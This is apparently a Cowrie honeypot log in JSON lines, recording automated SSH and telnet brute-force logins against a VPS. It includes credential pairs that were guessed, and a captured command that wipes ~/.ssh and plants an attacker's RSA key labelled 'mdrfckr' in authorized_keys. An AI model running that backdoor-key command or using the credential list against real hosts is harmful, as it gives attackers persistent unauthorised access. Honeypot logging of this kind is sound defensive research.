{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:45:03.944034Z","src_ip":"212.227.125.160","session":"67745c3fd163"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:45:05.077482Z","src_ip":"212.227.235.229","session":"93593c900d19"}
{"eventid":"cowrie.login.failed","username":"test2","password":"1234567","message":"login attempt [test2/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:45:06.482712Z","src_ip":"212.227.125.160","session":"67745c3fd163"}
{"eventid":"cowrie.login.success","username":"root","password":"syhhidc","message":"login attempt [root/syhhidc] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:45:07.271025Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:08.026099Z","src_ip":"212.227.125.160","session":"67745c3fd163"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:45:08.136436Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:45:08.137134Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:45:08.138272Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:08.469039Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:45:09.581258Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:45:09.582062Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:45:11.380889Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:11.381904Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45791,"dst_ip":"1.2.3.4","dst_port":22,"session":"a41d1498d747","protocol":"ssh","message":"New connection: 212.227.235.229:45791 (1.2.3.4:22) [session: a41d1498d747]","sensor":"my-vps","timestamp":"2025-08-31T05:45:11.544804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:45:12.924986Z","src_ip":"212.227.235.229","session":"a41d1498d747"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:45:13.089996Z","src_ip":"212.227.235.229","session":"a41d1498d747"}
{"eventid":"cowrie.session.closed","duration":"50.6","message":"Connection lost after 50.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:16.050070Z","src_ip":"212.227.235.229","session":"93593c900d19"}
{"eventid":"cowrie.session.closed","duration":12.780800819396973,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:16.121267Z","src_ip":"212.227.125.160","session":"9fb55f3fa535"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38114,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdcba22219ce","protocol":"telnet","message":"New connection: 212.227.125.160:38114 (1.2.3.4:23) [session: fdcba22219ce]","sensor":"my-vps","timestamp":"2025-08-31T05:45:16.319581Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60532,"dst_ip":"1.2.3.4","dst_port":22,"session":"65e33d270493","protocol":"ssh","message":"New connection: 212.227.125.160:60532 (1.2.3.4:22) [session: 65e33d270493]","sensor":"my-vps","timestamp":"2025-08-31T05:45:16.937288Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:45:21.190797Z","src_ip":"212.227.235.229","session":"a41d1498d747"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:22.366624Z","src_ip":"212.227.235.229","session":"a41d1498d747"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49373,"dst_ip":"1.2.3.4","dst_port":22,"session":"42eec2a59f22","protocol":"ssh","message":"New connection: 212.227.235.229:49373 (1.2.3.4:22) [session: 42eec2a59f22]","sensor":"my-vps","timestamp":"2025-08-31T05:45:22.524172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:45:22.843011Z","src_ip":"212.227.235.229","session":"42eec2a59f22"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:45:23.000575Z","src_ip":"212.227.125.160","session":"65e33d270493"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:45:23.002328Z","src_ip":"212.227.235.229","session":"42eec2a59f22"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:45:23.032705Z","src_ip":"212.227.125.160","session":"65e33d270493"}
{"eventid":"cowrie.session.closed","duration":12.788754940032959,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:29.108270Z","src_ip":"212.227.125.160","session":"fdcba22219ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38358,"dst_ip":"1.2.3.4","dst_port":23,"session":"013cd3445f09","protocol":"telnet","message":"New connection: 212.227.125.160:38358 (1.2.3.4:23) [session: 013cd3445f09]","sensor":"my-vps","timestamp":"2025-08-31T05:45:29.328478Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:45:33.009146Z","src_ip":"212.227.235.229","session":"42eec2a59f22"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:33.758137Z","src_ip":"212.227.235.229","session":"42eec2a59f22"}
{"eventid":"cowrie.session.closed","duration":"35.6","message":"Connection lost after 35.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:33.762434Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33164,"dst_ip":"1.2.3.4","dst_port":22,"session":"56ed0ebb4fa8","protocol":"ssh","message":"New connection: 212.227.235.229:33164 (1.2.3.4:22) [session: 56ed0ebb4fa8]","sensor":"my-vps","timestamp":"2025-08-31T05:45:37.964938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:45:37.965891Z","src_ip":"212.227.235.229","session":"56ed0ebb4fa8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:45:38.236809Z","src_ip":"212.227.235.229","session":"56ed0ebb4fa8"}
{"eventid":"cowrie.login.failed","username":"npm","password":"npm","message":"login attempt [npm/npm] failed","sensor":"my-vps","timestamp":"2025-08-31T05:45:39.361766Z","src_ip":"212.227.235.229","session":"56ed0ebb4fa8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43214,"dst_ip":"1.2.3.4","dst_port":22,"session":"553db1602677","protocol":"ssh","message":"New connection: 212.227.235.229:43214 (1.2.3.4:22) [session: 553db1602677]","sensor":"my-vps","timestamp":"2025-08-31T05:45:40.136453Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:40.634655Z","src_ip":"212.227.235.229","session":"56ed0ebb4fa8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:45:41.376487Z","src_ip":"212.227.235.229","session":"553db1602677"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:45:41.377234Z","src_ip":"212.227.235.229","session":"553db1602677"}
{"eventid":"cowrie.session.closed","duration":12.783939361572266,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:42.112355Z","src_ip":"212.227.125.160","session":"013cd3445f09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38594,"dst_ip":"1.2.3.4","dst_port":23,"session":"eb726ab2eda4","protocol":"telnet","message":"New connection: 212.227.125.160:38594 (1.2.3.4:23) [session: eb726ab2eda4]","sensor":"my-vps","timestamp":"2025-08-31T05:45:42.341869Z"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":48780,"dst_ip":"1.2.3.4","dst_port":22,"session":"889155994381","protocol":"ssh","message":"New connection: 43.159.36.188:48780 (1.2.3.4:22) [session: 889155994381]","sensor":"my-vps","timestamp":"2025-08-31T05:45:43.054195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:45:43.054857Z","src_ip":"43.159.36.188","session":"889155994381"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48608,"dst_ip":"1.2.3.4","dst_port":22,"session":"abefd3063b36","protocol":"ssh","message":"New connection: 212.227.235.229:48608 (1.2.3.4:22) [session: abefd3063b36]","sensor":"my-vps","timestamp":"2025-08-31T05:45:43.135808Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:45:43.299409Z","src_ip":"43.159.36.188","session":"889155994381"}
{"eventid":"cowrie.login.failed","username":"kafka","password":"123456","message":"login attempt [kafka/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:45:44.320735Z","src_ip":"43.159.36.188","session":"889155994381"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47308,"dst_ip":"1.2.3.4","dst_port":22,"session":"21f26adb0cd5","protocol":"ssh","message":"New connection: 212.227.235.229:47308 (1.2.3.4:22) [session: 21f26adb0cd5]","sensor":"my-vps","timestamp":"2025-08-31T05:45:45.418476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:45:45.419173Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:45.568317Z","src_ip":"43.159.36.188","session":"889155994381"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:45:45.709186Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.login.success","username":"root","password":"ctrls.1234$#$","message":"login attempt [root/ctrls.1234$#$] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:45:46.910047Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.login.failed","username":"test2","password":"12345678","message":"login attempt [test2/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:45:46.964447Z","src_ip":"212.227.235.229","session":"553db1602677"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:45:47.921874Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:45:47.922602Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:45:47.923750Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
